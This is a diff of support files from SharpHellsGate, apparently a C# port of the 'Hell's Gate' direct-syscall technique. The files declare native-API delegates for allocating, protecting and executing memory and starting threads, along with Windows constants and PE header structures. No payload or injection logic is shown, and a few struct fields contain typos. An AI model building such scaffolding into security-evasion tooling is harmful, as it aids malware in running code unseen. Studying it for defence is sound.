/// <param name="BaseAddress">A pointer to a variable that will receive the base address of the allocated region of pages.</param>
|
||||||
|
/// <param name="ZeroBits">The number of high-order address bits that must be zero in the base address of the section view.</param>
|
||||||
|
/// <param name="RegionSize">A pointer to a variable that will receive the actual size, in bytes, of the allocated region of pages.</param>
|
||||||
|
/// <param name="AllocationType">A bitmask containing flags that specify the type of allocation to be performed for the specified region of pages.</param>
|
||||||
|
/// <param name="Protect">A bitmask containing page protection flags that specify the protection desired for the committed region of pages.</param>
|
||||||
|
/// <returns>NtAllocateVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||||
|
public delegate uint NtAllocateVirtualMemory(
|
||||||
|
IntPtr ProcessHandle,
|
||||||
|
ref IntPtr BaseAddress,
|
||||||
|
IntPtr ZeroBits,
|
||||||
|
ref IntPtr RegionSize,
|
||||||
|
UInt32 AllocationType,
|
||||||
|
UInt32 Protect
|
||||||
|
);
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Managed wrapper around the NtProtectVirtualMemory native Windows function.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ProcessHandle">Handle to Process Object opened with PROCESS_VM_OPERATION access.</param>
|
||||||
|
/// <param name="BaseAddress">Pointer to base address to protect. Protection will change on all page containing specified address. On output, BaseAddress will point to page start address.</param>
|
||||||
|
/// <param name="NumberOfBytesToProtect">Pointer to size of region to protect. On output will be round to page size (4KB).</param>
|
||||||
|
/// <param name="NewAccessProtection">One or some of PAGE_... attributes.</param>
|
||||||
|
/// <param name="OldAccessProtection">Receive previous protection.</param>
|
||||||
|
/// <returns>NtProtectVirtualMemory returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||||
|
public delegate uint NtProtectVirtualMemory(
|
||||||
|
IntPtr ProcessHandle,
|
||||||
|
ref IntPtr BaseAddress,
|
||||||
|
ref IntPtr RegionSize,
|
||||||
|
UInt32 NewProtect,
|
||||||
|
out UInt32 OldProtect
|
||||||
|
);
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Managed wrapper around the NtCreateThreadEx native Windows function.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="hThread">Caller supplied storage for the resulting handle.</param>
|
||||||
|
/// <param name="DesiredAccess">Specifies the allowed or desired access to the thread.</param>
|
||||||
|
/// <param name="ObjectAttributes">Initialized attributes for the object.</param>
|
||||||
|
/// <param name="ProcessHandle">Handle to the threads parent process.</param>
|
||||||
|
/// <param name="lpStartAddress">Address of the function to execute.</param>
|
||||||
|
/// <param name="lpParameter">Parameters to pass to the function.</param>
|
||||||
|
/// <param name="CreateSuspended">Whether the thread will be in suspended mode and has to be resumed later.</param>
|
||||||
|
/// <param name="StackZeroBits"></param>
|
||||||
|
/// <param name="SizeOfStackCommit">Initial stack memory to commit.</param>
|
||||||
|
/// <param name="SizeOfStackReserve">Initial stack memory to reserve.</param>
|
||||||
|
/// <param name="lpBytesBuffer"></param>
|
||||||
|
/// <returns>NtCreateThreadEx returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||||
|
public delegate uint NtCreateThreadEx(
|
||||||
|
ref IntPtr hThread,
|
||||||
|
uint DesiredAccess,
|
||||||
|
IntPtr ObjectAttributes,
|
||||||
|
IntPtr ProcessHandle,
|
||||||
|
IntPtr lpStartAddress,
|
||||||
|
IntPtr lpParameter,
|
||||||
|
bool CreateSuspended,
|
||||||
|
uint StackZeroBits,
|
||||||
|
uint SizeOfStackCommit,
|
||||||
|
uint SizeOfStackReserve,
|
||||||
|
IntPtr lpBytesBuffer
|
||||||
|
);
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Managed wrapper around the NtWaitForSingleObject native Windows function.
|
||||||
|
/// </summary>
|
||||||
|
/// <param name="ObjectHandle">Open handle to a alertable executive object.</param>
|
||||||
|
/// <param name="Alertable">If set, calling thread is signaled, so all queued APC routines are executed.</param>
|
||||||
|
/// <param name="TimeOuts">Time-out interval, in microseconds. NULL means infinite.</param>
|
||||||
|
/// <returns>NtWaitForSingleObject returns either STATUS_SUCCESS or an error status code.</returns>
|
||||||
|
[UnmanagedFunctionPointer(CallingConvention.StdCall)]
|
||||||
|
public delegate uint NtWaitForSingleObject(
|
||||||
|
IntPtr ObjectHandle,
|
||||||
|
bool Alertable,
|
||||||
|
ref Structures.LARGE_INTEGER TimeOut
|
||||||
|
);
|
||||||
|
}
|
||||||
|
}
|
78
Hells Gate/C# Implementation/SharpHellsGate/Win32/Macros.cs
Normal file
78
Hells Gate/C# Implementation/SharpHellsGate/Win32/Macros.cs
Normal file
@ -0,0 +1,78 @@
|
|||||||
|
using System;
|
||||||
|
|
||||||
|
namespace SharpHellsGate.Win32 {
|
||||||
|
|
||||||
|
/// <summary>
|
||||||
|
/// Windows Macros used for error and success codes and bitmasks.
|
||||||
|
/// </summary>
|
||||||
|
public static class Macros {
|
||||||
|
|
||||||
|
// NTSTATUS
|
||||||
|
public static bool NT_SUCCESS(UInt32 ntstatus) => ntstatus <= 0x3FFFFFFF;
|
||||||
|
public static bool NT_INFORMATION(UInt32 ntstatus) => ntstatus >= 0x40000000 && ntstatus <= 0x7FFFFFFF;
|
||||||
|
public static bool NT_WARNING(UInt32 ntstatus) => ntstatus >= 0x80000000 && ntstatus <= 0xBFFFFFFF;
|
||||||
|
public static bool NT_ERROR(UInt32 ntstatus) => ntstatus >= 0xC0000000 && ntstatus <= 0xFFFFFFFF;
|
||||||
|
|
||||||
|
// Common NTSTATUS
|
||||||
|
public static UInt32 STATUS_SUCCESS { get; } = 0x00000000;
|
||||||
|
public static UInt32 STATUS_UNSUCCESSFUL { get; } = 0xC0000001;
|
||||||
|
public static UInt32 STATUS_NOT_IMPLEMENTED { get; } = 0xC0000002;
|
||||||
|
|
||||||
|
// Portable Executable
|
||||||
|
public static Int16 IMAGE_DOS_SIGNATURE { get; } = 0x5a00 | 0x4D; // MZ
|
||||||
|
public static Int32 IMAGE_NT_SIGNATURE { get; } = 0x00004500 | 0x00000050; // PE00
|
||||||
|
|
||||||
|
// Pseudo-Handles
|
||||||
|
public static IntPtr GetCurrentProcess() => new IntPtr(-1);
|
||||||
|
public static IntPtr GetCurrentThread() => new IntPtr(-2);
|
||||||
|
public static IntPtr GetCurrentProcessToken() => new IntPtr(-4);
|
||||||
|
public static IntPtr GetCurrentThreadToken() => new IntPtr(-5);
|
||||||
|
public static IntPtr GetCurrentThreadEffectiveToken() => new IntPtr(-6);
|
||||||
|
|
||||||
|
// Page and Memory permissions
|
||||||
|
public static UInt32 PAGE_NOACCESS { get; } = 0x01;
|
||||||
|
public static UInt32 PAGE_READONLY { get; } = 0x02;
|
||||||
|
public static UInt32 PAGE_READWRITE { get; } = 0x04;
|
||||||
|
public static UInt32 PAGE_WRITECOPY { get; } = 0x08;
|
||||||
|
public static UInt32 PAGE_EXECUTE { get; } = 0x10;
|
||||||
|
public static UInt32 PAGE_EXECUTE_READ { get; } = 0x20;
|
||||||
|
public static UInt32 PAGE_EXECUTE_READWRITE { get; } = 0x40;
|
||||||
|
public static UInt32 PAGE_EXECUTE_WRITECOPY { get; } = 0x80;
|
||||||
|
public static UInt32 PAGE_GUARD { get; } = 0x100;
|
||||||
|
public static UInt32 PAGE_NOCACHE { get; } = 0x200;
|
||||||
|
public static UInt32 PAGE_WRITECOMBINE { get; } = 0x400;
|
||||||
|
public static UInt32 PAGE_GRAPHICS_NOACCESS { get; } = 0x0800;
|
||||||
|
public static UInt32 PAGE_GRAPHICS_READONLY { get; } = 0x1000;
|
||||||
|
public static UInt32 PAGE_GRAPHICS_READWRITE { get; } = 0x2000;
|
||||||
|
public static UInt32 PAGE_GRAPHICS_EXECUTE { get; } = 0x4000;
|
||||||
|
public static UInt32 PAGE_GRAPHICS_EXECUTE_READ { get; } = 0x8000;
|
||||||
|
public static UInt32 PAGE_GRAPHICS_EXECUTE_READWRITE { get; } = 0x10000;
|
||||||
|
public static UInt32 PAGE_GRAPHICS_COHERENT { get; } = 0x20000;
|
||||||
|
public static UInt32 PAGE_ENCLAVE_THREAD_CONTROL { get; } = 0x80000000;
|
||||||
|
public static UInt32 PAGE_REVERT_TO_FILE_MAP { get; } = 0x80000000;
|
||||||
|
public static UInt32 PAGE_TARGETS_NO_UPDATE { get; } = 0x40000000;
|
||||||
|
public static UInt32 PAGE_TARGETS_INVALID { get; } = 0x40000000;
|
||||||
|
public static UInt32 PAGE_ENCLAVE_UNVALIDATED { get; } = 0x20000000;
|
||||||
|
public static UInt32 PAGE_ENCLAVE_DECOMMIT { get; } = 0x10000000;
|
||||||
|
public static UInt32 MEM_COMMIT { get; } = 0x00001000;
|
||||||
|
public static UInt32 MEM_RESERVE { get; } = 0x00002000;
|
||||||
|
public static UInt32 MEM_REPLACE_PLACEHOLDER { get; } = 0x00004000;
|
||||||
|
public static UInt32 MEM_RESERVE_PLACEHOLDER { get; } = 0x00040000;
|
||||||
|
public static UInt32 MEM_RESET { get; } = 0x00080000 ;
|
||||||
|
public static UInt32 MEM_TOP_DOWN { get; } = 0x00100000;
|
||||||
|
public static UInt32 MEM_WRITE_WATCH { get; } = 0x00200000;
|
||||||
|
public static UInt32 MEM_PHYSICAL { get; } = 0x00400000;
|
||||||
|
public static UInt32 MEM_ROTATE { get; } = 0x00800000;
|
||||||
|
public static UInt32 MEM_DIFFERENT_IMAGE_BASE_OK { get; } = 0x00800000;
|
||||||
|
public static UInt32 MEM_RESET_UNDO { get; } = 0x01000000;
|
||||||
|
public static UInt32 MEM_LARGE_PAGES { get; } = 0x20000000;
|
||||||
|
public static UInt32 MEM_4MB_PAGES { get; } = 0x80000000;
|
||||||
|
public static UInt32 MEM_64K_PAGES { get; } = (MEM_LARGE_PAGES | MEM_PHYSICAL);
|
||||||
|
public static UInt32 MEM_UNMAP_WITH_TRANSIENT_BOOST { get; } = 0x00000001;
|
||||||
|
public static UInt32 MEM_COALESCE_PLACEHOLDERS { get; } = 0x00000001;
|
||||||
|
public static UInt32 MEM_PRESERVE_PLACEHOLDER { get; } = 0x00000002;
|
||||||
|
public static UInt32 MEM_DECOMMIT { get; } = 0x00004000;
|
||||||
|
public static UInt32 MEM_RELEASE { get; } = 0x00008000;
|
||||||
|
public static UInt32 MEM_FREE { get; } = 0x00010000;
|
||||||
|
}
|
||||||
|
}
|
128
Hells Gate/C# Implementation/SharpHellsGate/Win32/Structures.cs
Normal file
128
Hells Gate/C# Implementation/SharpHellsGate/Win32/Structures.cs
Normal file
@ -0,0 +1,128 @@
|
|||||||
|
using System;
|
||||||
|
using System.Runtime.InteropServices;
|
||||||
|
|
||||||
|
namespace SharpHellsGate.Win32 {
|
||||||
|
public static class Structures {
|
||||||
|
|
||||||
|
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||||
|
public struct IMAGE_DOS_HEADER {
|
||||||
|
public UInt16 e_magic; /*+0x000*/
|
||||||
|
public UInt16 e_cblp; /*+0x002*/
|
||||||
|
public UInt16 e_cp; /*+0x004*/
|
||||||
|
public UInt16 e_crlc; /*+0x006*/
|
||||||
|
public UInt16 e_cparhdr; /*+0x008*/
|
||||||
|
public UInt16 e_minalloc; /*+0x00a*/
|
||||||
|
public UInt16 e_maxalloc; /*+0x00c*/
|
||||||
|
public UInt16 e_ss; /*+0x00e*/
|
||||||
|
public UInt16 e_sp; /*+0x010*/
|
||||||
|
public UInt16 e_csum; /*+0x012*/
|
||||||
|
public UInt16 e_ip; /*+0x014*/
|
||||||
|
public UInt16 e_cs; /*+0x016*/
|
||||||
|
public UInt16 e_lfarlc; /*+0x018*/
|
||||||
|
public UInt16 e_ovno; /*+0x01a*/
|
||||||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 4)]
|
||||||
|
public UInt16[] e_res; /*+0x01c*/
|
||||||
|
public UInt16 e_oemid; /*+0x024*/
|
||||||
|
public UInt16 e_oeminfo; /*+0x026*/
|
||||||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 10)]
|
||||||
|
public UInt16[] e_res2; /*+0x028*/
|
||||||
|
public UInt32 e_lfanew; /*+0x03c*/
|
||||||
|
}
|
||||||
|
|
||||||
|
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||||
|
public struct IMAGE_FILE_HEADER {
|
||||||
|
public UInt16 Machine; /*+0x000*/
|
||||||
|
public UInt16 NumberOfSections; /*+0x002*/
|
||||||
|
public UInt32 TimeDateStamp; /*+0x004*/
|
||||||
|
public UInt32 PointerToSymbolTable; /*+0x008*/
|
||||||
|
public UInt32 NumberOfSymbols; /*+0x00c*/
|
||||||
|
public UInt16 SizeOfOptionalHeader; /*+0x010*/
|
||||||
|
public UInt16 Characteristics; /*+0x012*/
|
||||||
|
}
|
||||||
|
|
||||||
|
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||||
|
public struct IMAGE_DATA_DIRECTORY {
|
||||||
|
public UInt32 VirtualAddress; /*+0x000*/
|
||||||
|
public UInt32 Size; /*+0x004*/
|
||||||
|
}
|
||||||
|
|
||||||
|
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||||
|
public struct IMAGE_OPTIONAL_HEADER64 {
|
||||||
|
public UInt16 Magic; /*+0x000*/
|
||||||
|
public Byte MajorLinkerVersion; /*+0x002*/
|
||||||
|
public Byte MinorLinkerVersion; /*+0x003*/
|
||||||
|
public UInt32 SizeOfCode; /*+0x004*/
|
||||||
|
public UInt32 SizeOfInitializedDatal; /*+0x008*/
|
||||||
|
public UInt32 SizeOfUninitializedData; /*+0x00c*/
|
||||||
|
public UInt32 AddressOfEntryPoint; /*+0x010*/
|
||||||
|
public UInt32 BaseOfCode; /*+0x014*/
|
||||||
|
public UInt64 ImageBasel; /*+0x018*/
|
||||||
|
public UInt32 SectionAlignment; /*+0x020*/
|
||||||
|
public UInt32 FileAlignment; /*+0x024*/
|
||||||
|
public UInt16 MajorOperatingSystemVersion; /*+0x028*/
|
||||||
|
public UInt16 MinorOperatingSystemVersion; /*+0x02a*/
|
||||||
|
public UInt16 MajorImageVersion; /*+0x02c*/
|
||||||
|
public UInt16 MinorImageVersion; /*+0x02e*/
|
||||||
|
public UInt16 MajorSubsystemVersion; /*+0x030*/
|
||||||
|
public UInt16 MinorSubsystemVersion; /*+0x032*/
|
||||||
|
public UInt32 Win32VersionValue; /*+0x034*/
|
||||||
|
public UInt32 SizeOfImage; /*+0x038*/
|
||||||
|
public UInt32 SizeOfHeaders; /*+0x03c*/
|
||||||
|
public UInt32 CheckSum; /*+0x040*/
|
||||||
|
public UInt16 Subsystem; /*+0x044*/
|
||||||
|
public UInt16 DllCharacteristics; /*+0x046*/
|
||||||
|
public UInt64 SizeOfStackReserve; /*+0x048*/
|
||||||
|
public UInt64 SizeOfStackCommit; /*+0x050*/
|
||||||
|
public UInt64 SizeOfHeapReserve; /*+0x058*/
|
||||||
|
public UInt64 SizeOfHeapCommit; /*+0x060*/
|
||||||
|
public UInt32 LoaderFlags; /*+0x068*/
|
||||||
|
public UInt32 NumberOfRvaAndSizes; /*+0x06c*/
|
||||||
|
[MarshalAs(UnmanagedType.ByValArray, SizeConst = 16)]
|
||||||
|
public IMAGE_DATA_DIRECTORY[] DataDirectory; /*+0x070*/
|
||||||
|
}
|
||||||
|
|
||||||
|
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||||
|
public struct IMAGE_NT_HEADERS64 {
|
||||||
|
public UInt32 Signature; /*+0x000*/
|
||||||
|
public IMAGE_FILE_HEADER FileHeader; /*+0x004*/
|
||||||
|
public IMAGE_OPTIONAL_HEADER64 OptionalHeader; /*+0x018*/
|
||||||
|
}
|
||||||
|
|
||||||
|
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||||
|
public struct IMAGE_EXPORT_DIRECTORY {
|
||||||
|
public UInt32 Characteristics; /*+0x000*/
|
||||||
|
public UInt32 TimeDateStamp; /*+0x004*/
|
||||||
|
public UInt16 MajorVersion; /*+0x008*/
|
||||||
|
public UInt16 MinorVersion; /*+0x00a*/
|
||||||
|
public UInt32 Name; /*+0x00c*/
|
||||||
|
public UInt32 Base; /*+0x010*/
|
||||||
|
public UInt32 NumberOfFunctions; /*+0x014*/
|
||||||
|
public UInt32 NumberOfNames; /*+0x018*/
|
||||||
|
public UInt32 AddressOfFunctions; /*+0x01c*/
|
||||||
|
public UInt32 AddressOfNames; /*+0x020*/
|
||||||
|
public UInt32 AddressOfNameOrdinals; /*+0x024*/
|
||||||
|
}
|
||||||
|
|
||||||
|
[StructLayout(LayoutKind.Sequential, Pack = 1)]
|
||||||
|
public struct IMAGE_SECTION_HEADER {
|
||||||
|
[MarshalAs(UnmanagedType.ByValTStr, SizeConst = 8)]
|
||||||
|
public string Name; /*+0x000*/
|
||||||
|
public UInt32 Misc; /*+0x008*/
|
||||||
|
public UInt32 VirtualAddress; /*+0x00c*/
|
||||||
|
public UInt32 SizeOfRawData; /*+0x010*/
|
||||||
|
public UInt32 PointerToRawData; /*+0x014*/
|
||||||
|
public UInt32 PointerToRelocations; /*+0x018*/
|
||||||
|
public UInt32 PointerToLinenumbers; /*+0x01c*/
|
||||||
|
public UInt16 NumberOfRelocations; /*+0x020*/
|
||||||
|
public UInt16 NumberOfLinenumbers; /*+0x022*/
|
||||||
|
public UInt32 Characteristics; /*+0x024*/
|
||||||
|
}
|
||||||
|
|
||||||
|
[StructLayout(LayoutKind.Explicit, Size = 1)]
|
||||||
|
public struct LARGE_INTEGER {
|
||||||
|
[FieldOffset(0)] public Int64 QuadPart; /*+0x000*/
|
||||||
|
[FieldOffset(0)] public UInt32 LowPart; /*+0x000*/
|
||||||
|
[FieldOffset(4)] public UInt32 HighPart; /*+0x004*/
|
||||||
|
}
|
||||||
|
}
|
||||||
|
}
|
BIN
Hells Gate/HellsGate.pdf
Normal file
BIN
Hells Gate/HellsGate.pdf
Normal file
Binary file not shown.
Loading…
Reference in New Issue
Block a user